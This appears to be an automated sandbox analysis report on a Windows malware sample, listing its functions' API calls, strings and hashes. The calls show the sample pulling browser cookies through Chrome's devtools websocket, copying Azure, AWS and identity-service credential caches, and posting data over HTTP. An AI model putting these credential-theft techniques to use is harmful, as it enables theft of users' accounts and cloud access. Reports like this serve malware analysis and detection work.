                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7cc387d45bccd0b430d699e0a967b2ed896b5c53a4e32f5370f3a4ddb014285a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cc387d45bccd0b430d699e0a967b2ed896b5c53a4e32f5370f3a4ddb014285a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59
                                                                                                                                                                                                                                                                                                                                  Function 00409BE0 Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 141stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409C33
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
                                                                                                                                                                                                                                                                                                                                  • connect_to_websocket.CHROME(?,00000000), ref: 00409C76
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409C9A
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00409CD5
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00409CFB
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00409D17
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00409D26
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00409D7E
                                                                                                                                                                                                                                                                                                                                  • free_result.CHROME(00000000), ref: 00409D8B
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$memset$lstrlen$InternetOpenconnect_to_websocketfree_resultlstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2548846003-3542011879
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8734fff803ff2259df70d84bc8d9029994c91eba7763f4fc208ffcbbdcbdb3e6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dd0e0b2e904cac6dcb4644251d8498bdcd69e700431b121c7f08c254ac6fdba9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8734fff803ff2259df70d84bc8d9029994c91eba7763f4fc208ffcbbdcbdb3e6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97517E71D10518ABCB14EBE0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69
                                                                                                                                                                                                                                                                                                                                  Function 00414FC0 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00414FD7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00415000
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00415063
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0041508C
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004150EF
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00415118
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,0079D4F8,?,000003E8), ref: 00414C9A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041517B
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4017274736-974132213
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a2fb46f9893cfbae3a4205d20c035e16abcfe103504196f8f477f36a038fe8bc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2fb46f9893cfbae3a4205d20c035e16abcfe103504196f8f477f36a038fe8bc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A
                                                                                                                                                                                                                                                                                                                                  Function 0040CFF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00798860,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
                                                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040D1CE
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,0079D698,0042156C,0079D698,00421568,00000000), ref: 0040D308
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421570), ref: 0040D317
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421574), ref: 0040D339
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D390
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0079D738,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D42A
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D439
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D488
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F
                                                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D4B4
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1973479514-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f0b3c5d1c9ecfab0a2871632074ce80a75c92c4857fa483f69c9842200507c0b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0b3c5d1c9ecfab0a2871632074ce80a75c92c4857fa483f69c9842200507c0b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A
                                                                                                                                                                                                                                                                                                                                  Function 004048D0 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479networkstringfileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,007A20A8), ref: 0040498A
                                                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,007A21E8), ref: 00404E38
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
                                                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
                                                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404EFD
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404F15
                                                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,007A2108,?,007A1498,00000000,00000000,00400100,00000000), ref: 00404B65
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404F1F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                                                                                                                  • String ID: "$"$------$------$------$!z
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2402878923-2937471342
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: faf6fe019ce6a6edea11826cf199f9daaa26cfc65b7d6fef1cb872ecf32b1025
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: faf6fe019ce6a6edea11826cf199f9daaa26cfc65b7d6fef1cb872ecf32b1025
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69
                                                                                                                                                                                                                                                                                                                                  Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,007A20A8), ref: 00406353
                                                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,007A1498,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
                                                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040653F
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00406549
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00406553
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
